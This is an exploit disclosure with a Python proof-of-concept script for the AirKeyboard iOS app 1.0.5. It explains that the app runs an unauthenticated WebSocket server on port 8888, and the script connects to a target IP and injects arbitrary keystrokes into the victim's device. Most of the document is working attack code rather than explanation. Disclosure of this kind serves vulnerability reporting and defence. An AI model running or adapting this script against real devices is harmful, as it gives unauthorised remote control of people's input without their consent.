# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://airkeyboardapp.com
# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
# Version: Version 1.0.5
# Tested on: iOS 18.5 with AirKeyboard app


'''
Description:
  The AirKeyboard iOS application exposes a WebSocket server on port 8888
which accepts arbitrary input injection messages from any client.
  No authentication or pairing process is required. This allows any
attacker to type arbitrary keystrokes directly into the victim’s iOS device
  in real-time without user interaction, resulting in full remote input
control.
'''

import websocket
import json
import time

target_ip = "192.168.8.101"
ws_url = f"ws://{target_ip}:8888"
text = "i'm hacker i can write on your keyboard :)"

keystroke_payload = {
    "type": 1,
    "text": f"{text}",
    "mode": 0,
    "shiftKey": True,
    "selectionStart": 1,
    "selectionEnd": 1
}

def send_payload(ws):
    print("[+] Sending remote keystroke...")
    ws.send(json.dumps(keystroke_payload))
    time.sleep(1)
    ws.close()

def on_open(ws):
    send_payload(ws)

def on_error(ws, error):
    print(f"[!] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[*] Connection closed")

def exploit():
    print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
    ws = websocket.WebSocketApp(ws_url,
                                 on_open=on_open,
                                 on_error=on_error,
                                 on_close=on_close)
    ws.run_forever()

if __name__ == "__main__":
    exploit()